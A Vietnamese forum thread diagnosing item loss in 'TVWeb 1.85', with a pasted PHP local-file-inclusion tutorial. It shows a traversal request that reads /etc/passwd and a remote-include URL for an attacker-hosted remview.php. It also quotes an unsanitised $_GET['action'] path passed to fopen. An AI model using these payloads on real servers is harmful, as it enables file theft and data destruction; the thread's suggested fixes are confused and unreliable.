Đã tìm ra nguyên nhân mất thẻ ở TVWeb 1.85

[mrrainnt]

cái này fix thôi cần gì xóa.............................................. ...

! Thay đổi code ở trên hả bạn ? thêm ký tự vào file .txt hay fix kiểu nào vậy ông ?

[thecong]

2- Include local file:

Loại này cũng gần giống như include remote file. Nhưng nó khác ở chổ: biến chứa tên file bị giới hạn bởi một thư mục đứng trước nó.

Vd: Một file bị lỗi include local file có dạng như sau:

---------BEGIN of test3.php-------

CODE <?php

include(“/home/$file”);

[…]

?>

----------END of test3.php---------

Xin chú ý là biến $file chưa được khai báo.
Nếu ta dùng:

[Only registered and activated users can see links. ] ([Only registered and activated users can see links. ]).[target].com/test3.php?file=http://www.[attacker].com/remview.php

Thì trong code của file test3.php sẽ trở thành như sau:

---------BEGIN of test3.php-------

CODE <?php

include(“/home/http://www.[attacker].com/remview.php”);

[…]

?>

----------END of test3.php---------

Một đường dẫn vô nghĩa. Do đó ta không thể include được file ta muốn.

Bấy giờ ta chỉ có thể sử dụng cách sau:

[Only registered and activated users can see links. ] ([Only registered and activated users can see links. ]).[target].com/test3.php?file=../../../../../../../../etc/passwd

Link trên đã khai báo biến $file với giá trị là: “../../../../../../../../etc/passwd”. Lúc này code của file test3.php có dạng:

---------BEGIN of test3.php-------

CODE <?php

include(“/home/../../../../../../../../etc/passwd”);

[…]

?>

----------END of test3.php---------

Các kí tự : “../../” đã giúp ta vượt qua các cấp thư mục trở về thư mục gốc”/” (đối với Linux) và sau đó là include file /etc/passwd. Thế là toàn bộ nội dung file passwd sẽ được hiển thị trên trình duyệt của attacker. Ta có thể thay thế /etc/passwd bằng bất cứ file nào ta muốn include (+xem). Xin chú ý: càng dùng nhiều kí tự “../” càng tốt vì nó sẽ đảm bảo đưa ta đến thư mục gốc.

II- Khắc phục:

Khắc hục lỗi file include này theo tớ là đơn giản hơn fix các lỗi khác nhiều.
Nếu sản phẩm bạn code chưa mắc lỗi hay đã này thì tôi xin khuyên bạn vài điều để hạn chế việc mắc phải lỗi này.

+ Hạn chế dùng các biến trong các hàm (include và require), nếu đã dùng nên đảm bảo các biến đó đã được khai báo đầy đủ và chính xác. Nếu bạn vẫn thích dùng biến thay thế cho đường dẫn thì tại sao bạn không dùng hàm define() nhỉ? Hàm này không cho phép user khai báo từ bên ngoài, hoặc bạn có thể dùng các kí tự đại diện cho các cấp thư mục như: “./” (thư mục hiện hành), “../” (thư mục cấp trên).

+ Hạn chế việc khai báo biến phụ thuộc vào nguời dùng cuối như ở Vd 2. Nên khai báo trực tiếp biến đó.

[YeuVo_ThuongCon]

Dây là lỗi do chủ quan
Ku Phương hay chủ quan một số vấn đề

Cái này chắc ku Phương biết rõ nhất

[mrrainnt]

Theo bác là nên như thế nào hả bác
đặt nhiều dấu / / / / / vào code đó hay sao thế ông thecong ?

[hoangtu_eck94]

nếu là do lỗi ở file

server/log/index.php

thì theo mình có thể đổi tên file đó đi cũng đc nhỉ? ^^

[thecong]

nếu là do lỗi ở file thì theo mình có thể đổi tên file đó đi cũng đc nhỉ? ^^

ừ hoặc có thể move nó đi chỗ khác, còn ai biết thì fix lỗi đó, lỗi đó đơn giản ý mà

Khắc hục lỗi file include này theo tớ là đơn giản hơn fix các lỗi khác nhiều.

+ Hạn chế dùng các biến trong các hàm (include và require), nếu đã dùng nên đảm bảo các biến đó đã được khai báo đầy đủ và chính xác. Nếu bạn vẫn thích dùng biến thay thế cho đường dẫn thì tại sao bạn không dùng hàm define() nhỉ? Hàm này không cho phép user khai báo từ bên ngoài, hoặc bạn có thể dùng các kí tự đại diện cho các cấp thư mục như: “./” (thư mục hiện hành), “../” (thư mục cấp trên).

[hoangtu_eck94]

ừ hoặc có thể move nó đi chỗ khác, còn ai biết thì fix lỗi đó, lỗi đó đơn giản ý mà

Khắc hục lỗi file include này theo tớ là đơn giản hơn fix các lỗi khác nhiều.

+ Hạn chế dùng các biến trong các hàm (include và require), nếu đã dùng nên đảm bảo các biến đó đã được khai báo đầy đủ và chính xác. Nếu bạn vẫn thích dùng biến thay thế cho đường dẫn thì tại sao bạn không dùng hàm define() nhỉ? Hàm này không cho phép user khai báo từ bên ngoài, hoặc bạn có thể dùng các kí tự đại diện cho các cấp thư mục như: “./” (thư mục hiện hành), “../” (thư mục cấp trên).

ừm. theo c là đơn giản và dễ vì c am hiểu về web. nhưng đối vs những ng gà về web thì đổi tên or move là đơn giản nhất. điển hình là t.

[mrrainnt]

! Sao không ai bày cách fix hết nhỉ, fix cho nó ngon lành ! move đi thì k hiển thị được log của Server nữa à ?

[thecong]

Trời nói thế mà các cậu ko hiểu ý tớ chỉ cách fix à

nguyên nhân do 2 dòng này

$file_log = "modules/".$module.".txt";

action = $_GET['action'];if (isset($action)) { $file_log = "modules/".$action.".txt"; $fopen_data = fopen($file_log, "w+"); fclose($fopen_data);}

lỗi này sảy ra khi biến chứa tên file bị giới hạn bởi một thư mục đứng trước nó.

ở đây biến là cái $action trong lập trình php thì để khai biến thì người ta dùng cái $ten biến

ở đây biến $action bị giới bạn bởi 1 thư mục trước nó để khắc phục cách này

bạn có thể dùng các kí tự đại diện cho các cấp thư mục như: “./” (thư mục hiện hành), “../” (thư mục cấp trên).

[NhocCoi]

Hay tốt lắm cu em, cố gắng lên, sắp tới vào đầu quân Cty anh